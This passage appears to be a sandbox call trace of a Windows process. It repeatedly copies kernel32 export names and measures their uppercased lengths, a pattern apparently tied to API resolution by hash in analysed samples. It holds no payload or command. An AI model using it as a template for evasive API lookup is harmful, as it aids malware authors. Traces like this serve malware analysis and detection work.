(lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.224] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.224] lstrlenA (lpString="BEEP") returned 4 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.224] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.224] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.224] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.224] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.224] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.224] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.224] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.224] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.224] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.224] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.224] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.225] lstrlenA (lpString="CANCELIO") returned 8 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.225] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.225] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.225] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.225] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.225] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.225] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.225] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.225] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.225] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.225] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.225] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.225] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.225] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.225] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.225] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.225] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.225] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.225] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.225] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.226] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.226] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.226] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.226] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.226] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.226] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.226] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.226] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.226] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.226] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.226] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.226] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.226] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.226] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.226] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.226] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.226] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.226] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.226] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.227] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.227] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.227] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.227] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.227] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.227] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.227] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.227] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.227] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.227] lstrlenA (lpString="COPYFILEA") returned 9 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.227] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.227] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.227] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.227] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.227] lstrlenA (lpString="COPYFILEW") returned 9 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.227] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.227] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.227] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.227] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.227] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.228] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.228] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.228] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.228] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.228] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.228] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.228] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.228] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.228] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.228] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.228] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.228] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.228] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.228] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.228] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.228] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.228] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.228] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.228] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.229] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.229] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.229] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.229] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.229] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.229] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.229] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.229] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.229] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.229] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.229] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.229] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.229] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.229] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.229] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.229] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.229] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.229] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.229] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.230] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.230] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.230] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.230] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.230] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.230] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.230] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.230] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.230] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.230] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.230] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.230] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.230] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.230] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.230] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.230] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.230] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.230] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.230] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.230] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.231] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.231] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.231] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.231] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: 